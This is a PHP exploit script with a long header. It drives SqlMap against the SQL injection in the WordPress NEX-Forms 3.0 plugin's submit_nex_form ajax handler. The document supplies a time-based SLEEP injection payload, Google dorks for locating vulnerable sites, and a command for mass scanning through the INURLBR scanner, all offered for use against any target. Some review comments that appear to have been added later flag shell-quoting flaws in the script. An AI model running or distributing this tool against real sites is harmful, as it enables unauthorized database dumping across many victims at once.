` # AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
# Exploit name: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability
# Type: SQL Injection
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
# Vulnerability discovered by: Claudio Viviani
# VENDOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Vulnerability Description
The "submit_nex_form" ajax function is affected by an SQL injection
vulnerability
# Tool Description
Automation script that runs the SqlMap tool against the given targets.
SqlMap command executed:
{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
--technique=B -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent
--answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1
# GET VULN
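SQL can be injected through the following GET parameter
GET VULN: nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
(Note: an integer cast such as the intval() call above discards any injected SQL, so this line presumably shows the corrected code rather than the vulnerable one; confirm against the referenced advisory.)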
Ex:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
# XPL inject DBMS: 'MySQL'
Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
- GOOGLE DORK
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
# COMMAND --help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'
# EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s
wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
# DOWNLOAD INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
# REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
EXPLOIT CODE:
<?php
/*
[ I N U R L - B R A S I L ] - [ By GoogleINURL ]
-----------------------------------------------------------------------------
# AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
# Vulnerability discovered by: Claudio Viviani
-----------------------------------------------------------------------------
# EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL
# VENTOR:
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Dork Google: inurl:nex-forms-express-wp-form-builder
# Dork Google: index of nex-forms-express-wp-form-builde
# GET VULN: nex_forms_Id=(id)
# $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
-----------------------------------------------------------------------------
# DBMS: 'MySQL'
# Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
-----------------------------------------------------------------------------
# Info: The "submit_nex_form" ajax function is affected from SQL
Injection vulnerability
# POC:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
-----------------------------------------------------------------------------
# --help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'
-----------------------------------------------------------------------------
# EXPLOIT MASS USE SCANNER INURLBR
# COMMAND: ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder'
-s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
# DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
-----------------------------------------------------------------------------
INFO:
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/
*/
// Runtime setup: error level 1 (fatal errors only), shown on the console,
// with no execution time limit so a long scan is not cut short.
error_reporting(1);
ini_set('display_errors', 1);
set_time_limit(0);
ini_set('max_execution_time', 0);
// NOTE(review): allow_url_fopen is normally a system-level setting, so this
// call is likely a no-op at runtime - confirm for the PHP build in use.
ini_set('allow_url_fopen', 1);

// Command used to start SqlMap; set the folder here,
// ex: python ../../sqlmap/sqlmap.py
// The value is copied into $params['folder'] and becomes the first word of
// the shell command that is executed later.
$folder_SqlMap = "sqlmap";

// Command-line options: -f, -t and -p each require a value; --help takes an
// optional one.
$op_ = getopt('f:t:p:', ['help::']);
// Startup banner: ASCII-art logo, the tool name and a pointer to --help.
// It is printed on every run, before the options are examined.
// NOTE(review): the literal appears hard-wrapped by the page rendering; it is
// kept exactly as found because every byte of it is program output.
echo "
\t\t\t\t _____
\t\t\t\t (_____) ____ _ _ _ _ _____ _ ____
_ _
\t\t\t\t (() ()) |_ _| \ | | | | | __ \| | | _ \
(_) |
\t\t\t\t \ / | | | \| | | | | |__) | | ______ | |_) |_ __
__ _ ___ _| |
\t\t\t\t \ / | | | . ` | | | | _ /| | |______| | _ <| '__/
_` / __| | |
\t\t\t\t /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | |
(_| \__ \ | |
\t\t\t\t [___] |_____|_| \_|\____/|_| \_\______| |____/|_|
\__,_|___/_|_|
\t\t\t\t\033[1;37m0xNeither war between hackers, nor peace for the system.\n
\t\t\t\t[+] [Exploit]: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL\n\t\t\t\t[+] [help]:
--help\033[0m\n\n";
// Usage text: the three supported options followed by example invocations.
// NOTE(review): the literal appears hard-wrapped by the page rendering (the
// last example is split across two lines); it is kept exactly as found.
$menu = "
\t\t\t\t -t : SET TARGET.
\t\t\t\t -f : SET FILE TARGETS.
\t\t\t\t -p : SET PROXY
\t\t\t\t Execute:
\t\t\t\t php wp3xplo1t.php -t target
\t\t\t\t php wp3xplo1t.php -f targets.txt
\t\t\t\t php wp3xplo1t.php -t target -p '
http://localhost:9090'
\n";
// With --help present, exit($menu) prints the usage text and ends the script;
// otherwise the ternary yields NULL and echo prints nothing.
echo isset($op_['help']) ? exit($menu) : NULL;
// Settings array handed to the scan helpers. Every key is created up front so
// the key order stays target, file, proxy, folder, line.
$params = [
    'target' => null,
    'file' => null,
    'proxy' => null,
    'folder' => $folder_SqlMap,
    'line' => "\t\t\t\t--------------------------------------------------------------------------------------------------------",
];

if (not_isnull_empty($op_['t'])) {
    // -t wins over -f. A scheme is prefixed unless the value already contains
    // the substring "http" anywhere.
    $params['target'] = strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}";
} elseif (not_isnull_empty($op_['f'])) {
    // The targets file is only recorded when no single target was given.
    $params['file'] = $op_['f'];
}

if (not_isnull_empty($op_['p'])) {
    // NOTE(review): the proxy value is wrapped in single quotes but not
    // shell-escaped, and it is later pasted into the command line built by
    // __exec(); a quote inside the value would end the quoting on the machine
    // running this script.
    $params['proxy'] = "--proxy '{$op_['p']}'";
}

// Guard against both a target and a file being set. 'file' is only filled in
// when 'target' is empty, so this condition cannot be true as written.
if (not_isnull_empty($params['target']) && not_isnull_empty($params['file'])) {
    exit("\t\t\t\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n");
}

// Single-target mode.
if (not_isnull_empty($params['target'])) {
    __exec($params);
    exit();
}

// File mode: one target per line.
if (not_isnull_empty($params['file'])) {
    __listTarget($params);
    exit();
}
/**
 * Tells whether a value is usable: not NULL and not "empty" by PHP's rules.
 *
 * Values that PHP's empty() treats as empty ('', '0', 0, array(), FALSE)
 * are therefore rejected as well.
 *
 * @param mixed $valor Value to test; defaults to NULL.
 * @return bool TRUE when the value is set and non-empty, FALSE otherwise.
 */
function not_isnull_empty($valor = NULL)
{
    if (is_null($valor)) {
        return FALSE;
    }

    return !empty($valor);
}
/**
 * Pushes pending output to the console so progress messages appear
 * immediately instead of when the script ends.
 */
function __plus()
{
    ob_flush(); // PHP's own output buffer first
    flush();    // then the system-level write buffers
}
/**
 * Reads a list of targets from a file and hands each entry to __exec().
 *
 * Despite its name, $file is the whole settings array; the path is taken from
 * $file['file'], and $file['target'] is overwritten for every entry.
 *
 * NOTE(review): entries are neither trimmed nor validated before they reach
 * __exec(), which pastes them into a shell command. A targets file obtained
 * from a third party is therefore untrusted input for the machine that runs
 * this script.
 *
 * @param array $file Settings array; reads key 'file', writes key 'target'.
 */
function __listTarget($file) {
// Load the whole file, split it on "\n", drop empty entries (array_filter
// without a callback removes every falsy value, the string "0" included) and
// remove duplicates.
$tgt_ = array_unique(array_filter(explode("\n",
file_get_contents($file['file']))));
// Report how many distinct entries were loaded.
echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS
LOADED : " . count($tgt_) . "\033[0m\n";
foreach ($tgt_ as $url) {
// Announce the entry about to be processed and flush so it shows at once.
echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING :
{$url} \033[0m\n";
__plus();
// Reuse the settings array, swapping in the current entry as the target.
$file['target'] = $url;
__exec($file) . __plus();
}
}
/**
 * Builds the SqlMap command line for one target and runs it through system().
 *
 * The request URL is always
 * {target}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1,
 * with nex_forms_Id named as the parameter under test. On the server side, a
 * request to that endpoint whose nex_forms_Id is not a plain integer is the
 * thing to log and reject.
 *
 * NOTE(review): $params['target'] and $params['proxy'] are placed between
 * single quotes without escapeshellarg(). A value containing a single quote
 * ends the quoting, and the remainder is interpreted by the shell of the
 * machine running this script.
 *
 * NOTE(review): the string literals below appear hard-wrapped by the page
 * rendering; they are kept exactly as found.
 *
 * @param array $params Settings array; reads keys 'line', 'target', 'folder'
 *                      and 'proxy'.
 */
function __exec($params) {
__plus();
// Separator line plus a timestamped start message.
echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO]
starting SqlMap...\n";
// Show the URL that will be tested, with a placeholder for the parameter value.
echo "[+] [" . date("H:i:s") . "] [INFO] TARGET:
{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n";
// Assemble the command: launcher, URL, parameter name, DBMS, optional proxy
// argument and the remaining fixed SqlMap options.
$command = "{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
"
. " -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent "
. " --answers='follow=N' --dbs --batch --time-sec 10 --level 2
--risk 1";
// system() streams the command's output to the console; $dados receives the
// command's exit status and is never inspected afterwards.
system($command, $dados);
__plus();
// Ends the whole PHP process, so no caller regains control after this point.
exit(0);
}
`